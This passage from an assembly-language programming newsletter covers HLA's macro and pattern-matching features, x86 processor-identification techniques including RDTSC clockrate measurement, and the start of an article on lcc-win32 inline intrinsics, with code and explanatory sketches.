it allows for boolean expressions. HLA, for example, doesn't allow the use
of
the conjunctive and disjunctive operators ( "&&" and "||") in boolean
expressions. I expect my students to generate the appropriate sequence of
low
level instructions themselves. In general, most HLA boolean expressions
compile into two instructions: a CMP and a conditional jump. I didn't want
to
go any farther than this because that would allow the students to avoid
learning how to write this code for themselves.
Although I designed HLA as a tool to teach assembly language programming,
this
is also a tool that I intend to use so I included lots of goodies for
advanced
assembly language programmers. For example, HLA's macro facilities are more
powerful than I've seen in any programming language based macro processor.
One
unique feature of HLA's macro preprocessor is the ability to create "context
free" control structures using macros. For example, suppose that you decide
that you need a new type of looping construct that HLA doesn't provide;
let's
say, a loop that will repeat once for each character in a string supplied as
a
parameter to the loop. Let's call this loop "OnceForEachChar" and decide
on
the following syntax:
OnceForEachChar( SomeString )
<< Loop Body >>
endOnceForEachChar;
On each iteration of this loop, the AL register will contain the
corresponding
character from the string specified as the OnceForEachChar operand. You can
easily implement this loop using the following HLA macro:
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] )); // Bump up index into string.
#if( @IsConst( SomeString ))
lea( eax, SomeString ); // Load address of string constant into EAX.
#else
mov( SomeString, eax ); // Get ptr to string.
#endif
add( [esp], eax ); // Point at next available character.
mov( [eax], al ); // Get the next available character.
cmp( al, 0 ); // See if we're at the end of the string.
je LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop; // Return to the top of the loop and repeat.
LoopExit:
add( 4, esp ); // Remove index into string from stack.
endmacro;
Anyone familiar with MASM's macro processor should be able to figure out
most
of this code. Note that the symbols "TopOfLoop" and "LoopExit" are local
symbols to this macro. Hence, if you repeat this macro several times in the
code, HLA will emit different actual labels for these symbols to the MASM
output file. The "@IsConst" is an HLA compile-time function that returns
true
if its operand is a constant. Obtaining the address for a constant is
fundamentally different than obtaining the address of a string variable
(since
HLA string variables are actually pointers to the string data). The most
interesting feature of this macro definition is the "terminator" line. This
actually defines a second macro that is active only after HLA encounters the
"OnceForEachChar" macro and control returns to the first statement after the
OnceForEachChar invocation. Invocations of "context free" macros always occur
in pairs; that is, for every "OnceForEachChar" invocation there must be a
matching "endOnceForEachChar" invocation. The following program demonstrates
this macro in use; it also demonstrates that you can nest this newly created
control structure in your program:
program SampleHLApgm3;
#include( "stdlib.hhf" )
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] ));
#if( @IsConst( SomeString ))
lea( eax, SomeString );
#else
mov( SomeString, eax );
#endif
add( [esp], eax );
mov( [eax], al );
cmp( al, 0 );
je LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop;
LoopExit:
add( 4, esp );
endmacro;
static
strVar: string := ":" nl;
begin SampleHLApgm3;
OnceForEachChar( "Hello" )
stdout.putc( al );
OnceForEachChar( strVar )
stdout.putc( al );
endOnceForEachChar;
endOnceForEachChar;
end SampleHLApgm3;
This program produces the output:
H:
e:
l:
l:
o:
Here's the MASM code the compiler emits for the sequence above (the
"strings"
segment was moved for clarity):
strings segment page public 'data'
align 4
?635_len dword 5
dword 5
?635_str byte "Hello",0,0,0
strings ends
pushd -1
?634__0278_:
inc dword ptr [esp+0] ;(type dword [esp])
lea eax, ?635_str
add eax, [esp+0] ;[esp]
mov al, [eax+0] ;[eax]
cmp al, 0
je ?636__0279_
push eax
call stdio_putc ;putc
pushd -1
?639__027d_:
inc dword ptr [esp+0] ;(type dword [esp])
mov eax, dword ptr ?630_strVar[0] ;strVar
add eax, [esp+0] ;[esp]
mov al, [eax+0] ;[eax]
cmp al, 0
je ?640__027e_
push eax
call stdio_putc ;putc
jmp ?639__027d_
?640__027e_:
add esp, 4
jmp ?634__0278_
?636__0279_:
add esp, 4
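If the control flow of the nested loops above is hard to follow in the emitted code, this Python model may help. It is a sketch, not a translation: the index that the macro keeps on the x86 stack is modelled with a Python list, the "nl" constant is assumed to be a single line feed, and the name once_for_each_char is made up for illustration.

```python
def once_for_each_char(text):
    """Yield each character of text, mimicking the macro's stack-held index."""
    stack = [-1]                  # pushd( -1 )
    data = text + "\0"            # the string data is zero terminated
    while True:
        stack[-1] += 1            # inc( (type dword [esp]) )
        al = data[stack[-1]]      # fetch the next character into "AL"
        if al == "\0":            # cmp( al, 0 ); je LoopExit
            break
        yield al                  # loop body runs here
    stack.pop()                   # add( 4, esp )

pieces = []
for outer in once_for_each_char("Hello"):
    pieces.append(outer)                     # stdout.putc( al )
    for inner in once_for_each_char(":\n"):  # strVar, with nl assumed to be "\n"
        pieces.append(inner)
output = "".join(pieces)
```

Because each loop reloads its character from its own index at the top of every iteration, the inner loop can overwrite AL without disturbing the outer one.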
In addition to the "terminator" clause, HLA macros also support a "keyword"
clause that lets you bury reserved words within a context-free language
construct. For example, the HLA language does not provide a SWITCH/CASE
statement. This omission was intentional. Rather than build the SWITCH/CASE
statement into the HLA language, I implemented the SWITCH .. CASE .. DEFAULT ..
ENDSWITCH statement using HLA's macro facilities (as a demonstration of HLA's
power). An HLA SWITCH statement takes the following form:
switch( reg32 )
case( constantList1 )
<< statements >>
case (constantList2 )
<< statements >>
.
.
.
default // This is optional
<< statements >>
endswitch;
The switch macro implements the "switch" and "endswitch" reserved words
using
the macro and terminator clauses in the macro declaration. It implements
the
"case" and "default" reserved words using the HLA "keyword" clause in a
macro
definition. The "keyword" clause is similar to the "terminator" clause
except
it doesn't force the end of the macro expansion in the invoking code. The
actual code for the HLA SWITCH statement is a little too complex to present
here, so I will extend the example of the OnceForEachChar macro to demonstrate
how you could use the "keyword" clause in a macro.
Let's suppose you wanted to add a "_break" clause to the "OnceForEachChar"
loop
( I'm using "_break" with an underscore because "break" is an HLA reserved
word). You could easily modify the "OnceForEachChar" macro to achieve this
by
using the following code:
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] ));
#if( @IsConst( SomeString ))
lea( eax, SomeString );
#else
mov( SomeString, eax );
#endif
add( [esp], eax );
mov( [eax], al );
cmp( al, 0 );
je LoopExit;
keyword _break;
jmp LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop;
LoopExit:
add( 4, esp );
endmacro;
The "keyword" clause defines a macro ("_break") that is active between the
"OnceForEachChar" and "endOnceForEachChar" invocations. This macro simply
expands to a jmp instruction that exits the loop. Note that if you have
nested
"OnceForEachChar" loops and you "_break" out of the innermost loop, the code
only jumps out of the innermost loop, exactly as you would expect.
HLA's macro facilities are part of a larger feature I refer to as the "HLA
Compile-Time Language." HLA actually contains a built-in interpreter that
executes while it is compiling your program. The compile-time language
provides conditional compilation ( the #IF..#ELSE..#ENDIF statements in the
previous example), interpreted procedure calls (macros), looping constructs
(#WHILE..#ENDWHILE), a very powerful constant expression evaluator,
compile-time I/O facilities (#PRINT, #ERROR, #INCLUDE, and #TEXT..#ENDTEXT),
and dozens of built-in compile time functions (like the @IsConst function
above).
The HLA built-in string functions (not to be confused with the HLA Standard
Library's string functions) are actually powerful enough to let you write a
compiler for a high level language completely within HLA. I mentioned
earlier
that it is possible to write an expression compiler within HLA; I was
serious.
The HLA compile-time language will let you write a sophisticated recursive
descent parser for arithmetic expressions (and other context-free language
constructs, for that matter).
HLA is a great tool for creating low-level Domain Specific Embedded
Languages
(DSELs). DSELs are mini-languages that you create on a project by project
basis to help reduce development time. HLA's compile time language lets you
create some very high level constructs. For example, HLA implements a very
powerful string pattern matching language in the "patterns" module found in
the
HLA Standard Library. This module lets you write pattern matching programs
that use techniques found in languages like SNOBOL4 and Icon. As a final
example, consider the following HLA program that translates RPN (Reverse Polish
Notation) expressions into their equivalent assembly language (HLA) statements
and displays the results on the standard output:
// This program translates user RPN input into an
// equivalent sequence of assembly language instrs (HLA fmt).
program RPNtoASM;
#include( "stdlib.hhf" );
static
s: string;
operand: string;
StartOperand: dword;
macro mark;
mov( esi, StartOperand );
endmacro;
macro delete;
mov( StartOperand, eax );
sub( eax, esi );
inc( esi );
sub( s, eax );
str.delete( s, eax, esi );
endmacro;
procedure length( s:string ); returns( "eax" ); nodisplay;
begin length;
push( ebx );
mov( s, ebx );
mov( (type str.strRec [ebx]).length, eax );
pop( ebx );
end length;
begin RPNtoASM;
stdout.put( "-- RPN to assembly --" nl );
forever
stdout.put( nl nl "Enter RPN sequence (empty line to quit): " );
stdin.a_gets();
mov( eax, s );
breakif( length( s ) = 0 );
while( length( s ) <> 0 ) do
pat.match( s );
// Match identifiers and numeric constants
mark;
pat.zeroOrMoreWS();
pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
pat.a_extract( operand );
stdout.put( " pushd( ", operand, " );" nl );
strfree( operand );
delete;
pat.alternate;
// Handle the "+" operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '+' );
stdout.put
(
" pop( eax );" nl
" add( eax, [esp] );" nl
);
delete;
pat.alternate;
// Handle the '-' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '-' );
stdout.put
(
" pop( eax );" nl
" pop( ebx );" nl
" sub( eax, ebx );" nl
" push( ebx );" nl
);
delete;
pat.alternate;
// Handle the '*' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '*' );
stdout.put
(
" pop( eax );" nl
" imul( eax, [esp] );" nl
);
delete;
pat.alternate;
// handle the '/' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '/' );
stdout.put
(
" pop( ebx );" nl
" pop( eax );" nl
" cdq(); " nl
" idiv( ebx, edx:eax );" nl
" push( eax );" nl
);
delete;
pat.if_failure
// If none of the above, it must be an error.
stdout.put( nl "Illegal RPN Expression" nl );
mov( s, ebx );
mov( 0, (type str.strRec [ebx]).length );
pat.endmatch;
endwhile;
endfor;
end RPNtoASM;
Consider for a moment the code that matches an identifier or an integer
constant:
mark;
pat.zeroOrMoreWS();
pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
pat.a_extract( operand );
stdout.put( " pushd( ", operand, " );" nl );
strfree( operand );
delete;
The "mark;" invocation saves a pointer into the "s" string where the current
identifier starts. The pat.zeroOrMoreWS pattern matching function skips over
zero or more whitespace characters. The pat.oneOrMoreCset pattern matching
function matches one or more alphanumeric and underscore characters (a crude
approximation for identifiers and integer constants). The pat.a_extract
function makes a copy of the string between the "mark" and the "a_extract"
calls (this corresponds to the whitespace and identifier/constant). The
stdout.put statement emits the HLA machine instruction that will push this
operand onto the x86 stack for later computations. The remaining statements
clean up allocated string storage space and delete the matched string from
"s".
Although the "pat.xxxxx" statements look like simple function calls, there's
actually a whole lot more going on here. HLA's pattern matching facilities,
like SNOBOL4 and Icon, support success, failure, and backtracking. For
example, if the pat.oneOrMoreCset function fails to match at least one
character from the set, control does not flow down to the pat.a_extract
function. Instead, control flows to the next "pat.alternate" or
"pat.if_failure" clause. Some calls to HLA pattern matching routines may
even
cause the program to back up in the code and reexecute previously called
functions in an attempt to match a difficult pattern (i.e., the backtracking
component). This article is not the place to get into the theory of pattern
matching; however, these few examples should be sufficient to show you that
something really special is going on here. And all these facilities were
developed using the HLA compile-time language. This should give you a small
indication of what is possible when using the HLA compile time language
facilities.
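To see what the RPN translator produces without installing HLA, here is a rough Python equivalent. It is a sketch only: a regular expression stands in for the "pat" module's alternation and backtracking, and the names TOKEN, OPERATORS, and rpn_to_hla are invented for this illustration. The emitted strings follow the HLA program, with the division case pushing the quotient from EAX.

```python
import re

# An operand (identifier or number) or one of the four operators,
# each optionally preceded by whitespace.
TOKEN = re.compile(r"\s*([A-Za-z0-9_]+|[-+*/])")

OPERATORS = {
    "+": ["pop( eax );", "add( eax, [esp] );"],
    "-": ["pop( eax );", "pop( ebx );", "sub( eax, ebx );", "push( ebx );"],
    "*": ["pop( eax );", "imul( eax, [esp] );"],
    "/": ["pop( ebx );", "pop( eax );", "cdq();",
          "idiv( ebx, edx:eax );", "push( eax );"],
}

def rpn_to_hla(expr):
    """Translate one RPN line into a list of HLA-style instruction strings."""
    lines, pos = [], 0
    expr = expr.rstrip()
    while pos < len(expr):
        match = TOKEN.match(expr, pos)
        if match is None:                  # plays the role of pat.if_failure
            raise ValueError("Illegal RPN Expression")
        token = match.group(1)
        if token in OPERATORS:
            lines.extend(OPERATORS[token])
        else:
            lines.append(f"pushd( {token} );")
        pos = match.end()                  # plays the role of the "delete" macro
    return lines

listing = rpn_to_hla("a b +")
```

The sketch makes no attempt to check that the expression is well formed (for example, that an operator has two operands on the stack); neither does the HLA program.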
The HLA language is far too rich to describe in this short article (the
*very*
rough documentation for the language is nearly 300 pages long). For more
information, check out the on-line documentation for HLA at
http://webster.cs.ucr.edu. Someday, you'll also be able to learn about HLA
via "The Art of Assembly Language Programming, HLA/Windows version." I will
keep interested individuals updated on the progress of AoA at the Webster
web
site.
HLA is totally free. It is public domain software and there are no
restrictions on its use, the use of the HLA standard library, or the HLA
compiler source code. Do whatever you want with it and have a lot of fun!
rhyde@...
http://webster.cs.ucr.edu
http://www.cs.ucr.edu/docs/webster/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Processor Identification - Part II
by Chris Dragan & Chili
In the first part of this article I'll explain a lot of different ways to
check
for older processors by exploiting bugs, undocumented features, etc. I'll
also
show how to write an invalid-opcode exception handler, calculate the size
of
the prefetch queue and some other things. Finally, in the last part Chris
shows
how to determine the processor clockrate with the RDTSC instruction.
Chris didn't have much free time at the moment and so couldn't contribute
more,
therefore I had to put this article together pretty much myself, and I hope
the
quality didn't go down very much -- since Chris' texts are definitely
better
than mine.
AAD (ASCII Adjust before Division) Instruction
----------------------------------------------
This instruction allows us to distinguish between at least NEC's V-series
and
Intel processors. AAD, usually in preparation for a division using DIV or
IDIV,
works like this:
AL = AH * 10 + AL
AH = 0
This converts the unpacked two-digit BCD number in AX into binary; the normal
opcode is "0d5h, 0ah". The difference is that while Intel's chips allow one to
replace the multiplicand with any number (and so build your own AAD instruction
for various number systems), NEC always treats it as 10, whatever the second
byte says. So by replacing the second byte with a different number, we can
check if the operand is actually used, and if not, assume it's a NEC.
mov ax, 0f0fh
db 0d5h, 10h ; opcode for AAD 16
cmp al, 0ffh ; check if multiplicand was 10 or not
jz _is_Intel
jnz _is_NEC
This should be used as another way (in addition to the one presented in
the
first article on this subject) to distinguish the NEC V20/V30 series from
the
Intel 8086/88.
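The arithmetic behind the AAD test can be checked with a small Python model. This is only a sketch of the behaviour described above, not a processor emulator; the function name aad and the honours_operand switch are assumptions made for the illustration.

```python
def aad(ax, base=10, honours_operand=True):
    """Model AAD: AL = AH * multiplier + AL (8 bits), AH = 0. Returns the new AX.

    honours_operand=True  models a chip that uses the second opcode byte.
    honours_operand=False models a chip that always multiplies by 10.
    """
    ah, al = (ax >> 8) & 0xFF, ax & 0xFF
    multiplier = base if honours_operand else 10
    return (ah * multiplier + al) & 0xFF   # AH is cleared, so AX equals AL

intel_ax = aad(0x0F0F, base=16, honours_operand=True)   # db 0d5h, 10h
nec_ax = aad(0x0F0F, base=16, honours_operand=False)
```

With AX = 0f0fh, a chip that uses the operand leaves 0ffh in AL (15 * 16 + 15), while one that always uses 10 leaves 0a5h (15 * 10 + 15), so the comparison against 0ffh separates the two.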
PUSHA Instruction
-----------------
Here is another good way to differentiate NECs from Intel's 8086/88. Since the
V20 and V30 execute all the 80186 instructions, and knowing that PUSHA executes
on the 8086/88 as "JMP $+2" (which swallows the byte that follows it), one can,
for example, put an STC right after it and then see if the carry flag was
really set.
clc ; ensure that CF is clear
pusha ; executed on 8086/88 as JMP $+2
stc
jc _is_NEC_or_186plus
jnc _is_808x
<whatever code here>
.
.
.
_is_NEC_or_186plus:
popa ; clean up
Of course the carry flag must not already be set before performing this
test.
POP CS Trick
------------
I'll just show one last way of accomplishing the same. The trick is that, on an
8086/88 (non-CMOS versions, at least), the opcode "0fh" will perform a POP CS;
on a 186/188 it is an invalid opcode, generating an INT 6 exception; while NECs
and 286+ use that encoding as a prefix byte to indicate new instructions. So, to
tell NEC's V20/V30 (also V40/V50, I think) and the 8086/88 apart, note that with
the byte string "0fh, 14h, 0c3h" the CPU will perform the following:
    8086/88              V20/V30
    -------              -------
    pop cs               set1 bl, cl
    adc al, 0C3h
It is then easy to write a piece of code that will distinguish between them:
xor al, al ; BTW: clears CF
push cs
db 0fh, 14h, 0c3h ; instruction(s) -- see above
cmp al, 0c3h ; check if ADC was executed
je _is_808x
jne _is_NEC_V20plus
<whatever code here>
.
.
.
_is_NEC_V20plus:
pop ax ; clean up (no POP CS available)
Note that, again, the carry flag must be cleared before execution of this
test. Also, just a reminder that this is to be used when you know that the
processor is not a 186 or above but an older one.
Word Write
----------
On the 8086/88 (+ V20/V30), when a word write is performed at offset 0ffffh
in a segment, one byte will be written at that offset and the other at
offset 0, while an 80186 family processor will write one byte at offset
0ffffh and the other one byte beyond the end of the segment (offset 10000h).
So all we have to do is test if it wraps around or not:
mov ax, ds:[0ffffh] ; save original bytes
mov word ptr ds:[0ffffh], 0aaaah
cmp byte ptr ds:[0], 0aah ; did 2nd byte wrap around?
mov ds:[0ffffh], ax ; restore original bytes
je _is_808x
jne _is_8018x
Again, note that this should only be used for the specified processors.
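The address arithmetic behind this test can be written down in a few lines
of C. This is just a model of the behaviour described above, not code to
run on the target; the function name and the "wraps" parameter are
assumptions made for the illustration.

```c
#include <stdint.h>

/* Offset at which the second byte of a word lands when the word is
   written at `offset` inside a 64 KB segment.
   wraps = 1 models the 8086/88 and V20/V30 (offset wraps to 0),
   wraps = 0 models the 8018x (byte goes past the segment end). */
uint32_t second_byte_offset(uint16_t offset, int wraps)
{
    uint32_t next = (uint32_t)offset + 1;
    return wraps ? (next & 0xFFFFu) : next;
}
```

For offset 0ffffh the first model gives 0 and the second gives 10000h,
which is why checking the byte at ds:[0] is enough to tell them apart.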
Multi-Prefix Instructions
-------------------------
The standard 8086/88 processors have a bug such that they lose multiple
prefixes if an interrupt occurs, while CMOS versions do not, since this bug
was fixed in the 80C86/C88 processors (NEC V20/V30 processors also do not
have this bug -- allowing the following code to also be applicable to
them). If we execute a string operation with a repeat prefix and also a
segment override for long enough to be interrupted, then, if we are on an
8086/88, the REP prefix will be lost when the instruction is interrupted,
since on return only the last prefix will be retained. If instead we are on
a low-power CMOS version, the code will successfully complete.
mov cx, 0ffffh
sti
rep lods byte ptr es:[si] ; sure to be interrupted
cli
jcxz _not_standard_808x ; check if REP was completed
<if here, then it's just a standard 8086/88>
.
.
.
Just in case you want to use a piece of code like this without having to
worry about that bug, here's how to get it to work correctly every time
(with interrupts enabled -- this time with MOVS):
do_REP: rep movs byte ptr es:[di], es:[si] ; may be interrupted!
jcxz carry_on ; if not, carry on,
loop do_REP ; else, complete REP
carry_on:
Invalid-Opcode Exception Handler (INT6)
---------------------------------------
From the 80186 upwards, all processors allow one to implement an
invalid-opcode exception handler, which gives us a great way of telling the
families of CPUs apart. All one does is hook the INT6 interrupt vector with
our own handler and see if some specific instructions trigger an INT6 or
not. With our handler we trap those exceptions and then toggle a little
flag that shows us the processor doesn't support that instruction.
In the code below I hooked the INT6 vector by changing the IVT (Interrupt
Vector Table) directly (one can also use DOS services for that), then test
which processor we're running on, and after that restore things back to
what they were before (except registers; place some push/pop code yourself
according to your needs -- by the way, Robert Collins is a god!). Anyway,
the code is pretty much self-explanatory:
; Hook INT6 -- set up our own handler
push 0 ; point to IVT (0000:0000) - (1
pop es ; byte saved thanks to Chris!)
cli
lds ax, es:[6*4] ; get original handler vector
mov es:[6*4], offset INT6_handler ; then, replace it with
mov es:[6*4+2], cs ; our own handler
sti
; Test if processor is at least a 80186 -- Executes "SHL DX, 10"?
mov cx, 1 ; set up invalid-opcode flag
shl dx, 0ah
jcxz unknown_CPU
; Test if processor is at least a 80286 -- Executes "SMSW DX"?
smsw dx
jcxz _is_80186
; Test if processor is at least a 80386 -- Executes "MOV EDX, EDX"?
mov edx, edx
jcxz _is_80286
; Test if processor is at least a 80486 -- Executes "XADD DL, DL"?
xadd dl, dl
jcxz _is_80386
<if here, then it's a 80486 or higher processor>
.
.
.
; Restore original INT6 handler address -- for all processors type!
cli
mov es:[6*4], ax ; restore original INT6 offset
mov es:[6*4+2], ds ; restore original INT6 segment
sti
<whatever code here>
.
.
.
; Our own INT6 handler
INT6_handler:
xor cx, cx ; toggle invalid-opcode flag
push bp
mov bp, sp
add word ptr ss:[bp+2], 3 ; adjust the return address to
; after the invalid opcode (3
; bytes for all)
pop bp
iret
Note that: 1) this code should only be used if you know the processor is
at least an 80186; 2) if you change the contents of AX, ES or DS before
restoring the original INT6 handler, don't forget to save them first and
restore them afterwards; 3) of course, the code in INT6_handler should only
be executed by means of an INT6!
Maybe a very small extra explanation is required regarding the
INT6_handler. We need to adjust the return address because, when an
invalid-opcode exception is issued, the saved CS and IP (which are pushed
onto the stack) point to the instruction that generated the exception,
instead of the next one (as usually happens for other interrupts).
Instruction Prefetch Queue
--------------------------
16-bit processors (i.e. 8086s, 80186s, V30s) have a prefetch queue 6 bytes
in size and replenish the instruction queue once at least two bytes in it
are empty, while their 8-bit bus versions (i.e. 8088s, 80188s, V20s) only
have a 4-byte prefetch queue and initiate the prefetch cycle when there is
at least one empty byte in it.
So, knowing this about their Bus Interface Unit design, it isn't difficult
to write some code to distinguish between the two categories. We'll make a
routine that uses self-modifying code to change the opcode at the fifth
byte and then see if it was executed or not.
xor cx, cx
cli ; prevent the queue from being emptied
lea di, patch
mov al, 90h ; load NOP opcode
stosb ; patch fifth byte to a NOP
nop
nop
nop
nop
patch: inc cx ; did the INC execute?
sti
jcxz _is_8bit
<if here, then it's a 16-bit processor>
I believe there is enough time for the prefetch queue to fill, though I
have no chance to confirm it!
Just in case you want to be on the safe side, here's a routine that will
most certainly work:
xor dx, dx
cli ; prevent the queue from being emptied
lea di, patch+2
mov al, 90h ; load NOP opcode
mov cx, 3
std
rep stosb ; patch fifth byte to a NOP
nop
nop
nop
nop
patch: inc dx ; did the INC execute?
nop
nop
sti
test dx, dx
jz _is_8bit
<if here, then it's a 16-bit processor>
Again, I must stress that this code should only be used for the specified
processors, since it will without a doubt fail on others.
Do It The Optimized Way!
------------------------
Here is our size-optimized way of determining the processor type. It's an
algorithm that uses Intel's guidelines and distinguishes between pre-80286,
80286, 80386, 80486 without CPUID and 80486+ with CPUID support.
Chris is using a similar routine in his CPU identification utility.
; Detection of pre-80286/80286/386+ processors
mov ax, 7202h ; set bits 12-14 and clear bit 15
push ax
popf
pushf
pop ax
test ah, 0f0h
js _is_pre286 ; bit 15 of FLAGS is set on pre-286
jz _is_80286 ; bits 12..15 of FLAGS are clear on 286
; processor in real mode (no V86 mode
; on 286)
; <if here, then it's a 80386 or higher processor>
; Detection of 80386/80486(w/out CPUID)/80486+(CPUID compliant)
pushfd
pop eax
mov edx, eax
xor eax, 00240000h ; flip bits 18 (AC) and 21 (ID)
push eax
popfd
pushfd
pop eax
xor eax, edx ; check if both bits didn't toggle
jz _is_80386
shr eax, 19 ; check if only bit 18 toggled
jz _is_80486_without_CPUID
<if here, then it's a 80486 with CPUID or higher processor>
And so, we got the whole code down to a measly 46 bytes!
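The decision made by the second half of that routine can be sketched in C
as follows. This is only a model of the bit tests (the enum and function
names are invented for the illustration); "before" is EFLAGS as first read
and "after" is EFLAGS read back after trying to flip AC and ID.

```c
#include <stdint.h>

enum cpu_class { CPU_386, CPU_486_NO_CPUID, CPU_486_CPUID_OR_LATER };

#define EFLAGS_AC (1u << 18)   /* alignment check, toggles on 486+   */
#define EFLAGS_ID (1u << 21)   /* toggles only when CPUID is present */

/* Mirrors: xor eax,edx / jz 386 / shr eax,19 / jz 486 without CPUID */
enum cpu_class classify_eflags(uint32_t before, uint32_t after)
{
    uint32_t toggled = before ^ after;
    if (toggled == 0)
        return CPU_386;               /* neither bit could be flipped */
    if ((toggled >> 19) == 0)
        return CPU_486_NO_CPUID;      /* only bit 18 (AC) flipped */
    return CPU_486_CPUID_OR_LATER;    /* bit 21 (ID) flipped too */
}
```

Note that EFLAGS_AC | EFLAGS_ID is the 00240000h mask used in the XOR.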
CR0 Register - Bit 4
--------------------
The 80386 DX may be differentiated from the other models by trying to clear
bit 4 (ET) in the CR0 register. It can be toggled on the 80386 DX, while it
is hardwired to 1 on any of the other family models. So this gives us a
good way to differentiate them: try to clear that bit and then see whether
it was forced back to 1 or not.
; Test CR0 register -- bit 4 (ET)
mov eax, cr0
mov edx, eax ; save original CR0
and al, 11101111b ; clear bit 4
mov cr0, eax
mov eax, cr0
mov cr0, edx ; restore original CR0
test al, 00010000b ; check if bit 4 was forced high
jz _is_a_80386DX_model
jnz _is_not_a_80386DX_and_therefore_is_some_other_model
Note that I'm not sure if this can be done safely and reliably under
protected mode!
Clockrate
---------
Before the Pentium, it was difficult to determine the processor clockrate.
It was typically based on sophisticated timing loops, which were often
unreliable. With the Pentium, Intel introduced the RDTSC instruction, which
returns the number of clocks since the processor started. The following
code illustrates how to use it.
; Determine RDTSC support (assuming that CPUID is supported)
mov eax, 1
cpuid
test edx, 10h ; bit 4 is set when RDTSC is supported
jz _no_rdtsc
; Disable all interrupts but timer IRQ0
in al, 21h
mov ah, al
in al, 0A1h
push ax ; Save previous values
mov al, 0FEh
out 21h, al
mov al, 0FFh
out 0A1h, al
; Assuming that timer runs at 55ms periods, get the clockrate
hlt ; Wait for timer
rdtsc ; Read TSC
mov ebx, eax ; Save lo
mov ecx, edx ; Save hi
hlt ; Wait for timer
rdtsc ; Read TSC
sub eax, ebx ; Difference lo
sbb edx, ecx ; Difference hi
; Calculate clockrate in MHz
mov ecx, 54925
div ecx
mov [Clockrate], eax
; Restore interrupt states
pop ax
out 0A1h, al
mov al, ah
out 21h, al
The above code can be run in real mode, V86 mode or protected mode in ring0.
In V86 mode it will hang Pentium and Pentium MMX processors, but on other
processors it will work OK.
In this code, clockrate is determined as: (T2-T1)*PIT/(D*M), where T1 and
T2 are the numbers of clocks returned by RDTSC, PIT is the input frequency
of the Programmable Interval Timer (0x1234DD Hz), D is the value by which
that frequency is divided (0x10000) and M is 1000000 (we want it in MHz).
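As a cross-check of the constant 54925 used in the DIV above, here is the
same calculation as a C sketch. The function names are made up for this
illustration, and the two TSC readings are assumed to have been taken
exactly one timer tick apart, as in the assembly.

```c
#include <stdint.h>

#define PIT_HZ      0x1234DDu  /* PIT input clock, 1193181 Hz       */
#define PIT_DIVISOR 0x10000u   /* default divisor, the ~55 ms tick  */

/* Microseconds in one timer tick: D * M / PIT, rounded to nearest. */
uint32_t tick_microseconds(void)
{
    uint64_t num = (uint64_t)PIT_DIVISOR * 1000000u;
    return (uint32_t)((num + PIT_HZ / 2) / PIT_HZ);
}

/* Clock rate in MHz from two TSC readings one timer tick apart. */
uint32_t clockrate_mhz(uint64_t t1, uint64_t t2)
{
    return (uint32_t)((t2 - t1) / tick_microseconds());
}
```

Dividing the clock count by the tick length in microseconds is the same as
multiplying by PIT/(D*M), so a CPU that counts 5492500 clocks in one tick
comes out at 100 MHz.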
Is This The End?
----------------
I think this is the end as far as old CPUs are concerned, since a lot of
techniques have already been covered here (though there are some more), but
not for other processors, like AMD and IBM and whatever else Chris and I
think up before the next article.
Take the time to visit Chris' web page, where you can find the source for
his CPU identification utility (for Netwide Assembler). His place is at:
http://ams.ampr.org/cdragan/
Also, here are some other sources of information that you might want to
take a look at (available somewhere on the net -- since I don't remember
where I got them from):
WHATCHIP.ASM (Christy Gemmell)
86BUGS.LST (Harald Feldmann/Hamarsoft)
[distributed with Ralf Brown's Interrupt list]
OPCODES.LST (Potemkin's Hackers Group)
[distributed with Ralf Brown's Interrupt list]
cpu.asm (Robert Mashlan)
WHATCPU.ASM (Dave M. Walker)
COMPTEST 2.60 (Norbert Juffa)
Ralf Brown's Interrupt List:
http://www.cs.cmu.edu/~ralf/files.html
This, in addition to the ones already referenced in the first article of
this series.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
The LCC Intrinsics Utility
Jacob Navia
Lcc-win32 is a free C compiler system. It features an IDE, a resource
compiler, a linker, a librarian, a windowed debugger, and other goodies.
Here, I would like to describe a special feature of lcc-win32 that will
surely be appreciated by colleagues who use assembly.
Lcc-win32 understands special macro definitions called intrinsics. These
constructs are seen as normal function calls by the front end of the
compiler, but are expanded inline by the back end.
You can add your own intrinsic macros to the system, allowing you to use the
power and speed of assembly language within the context of a more powerful
and safer high-level language.
I will present two examples here, to give you an idea of what this can look
like.
You will need the source code of lcc-win32, which can be obtained at the
home page: http://ps.qss.cz/lcc or ftp://ftp.cs.virginia.edu/pub/lcc-win32
Inlining the strlen function
----------------------------
Let's assume the strlen function of the C library is just too slow for you.
Instead of generating:
pushl Arg
call _strlen
addl $4,%esp
you would like to generate inline the following code:
; Inlined strlen. The input argument is in ECX and points to the
; character string
orl $-1,%eax
loop:
inc %eax
cmpb $0,(%ecx,%eax)
jnz loop
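For readers who think more easily in C, the loop above corresponds roughly
to the following. It is only a sketch to show the "start at -1 and
pre-increment" idea; the name strlen_model is made up and is not part of
lcc-win32.

```c
/* C rendering of the inlined loop: start the counter at -1,
   increment first, then test the byte at that index. */
int strlen_model(const char *s)
{
    int n = -1;              /* orl  $-1,%eax          */
    do {
        n++;                 /* inc  %eax              */
    } while (s[n] != 0);     /* cmpb $0,(%ecx,%eax)    */
                             /* jnz  loop              */
    return n;                /* result is left in EAX  */
}
```

Starting at -1 means the loop body needs no separate first-iteration case:
an empty string exits after a single increment with a result of 0.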
This function, then, should be inlined by the compiler. The C interface
would be:
_strlen(str);
The prototype must be:
extern int _stdcall _strlen(char *);
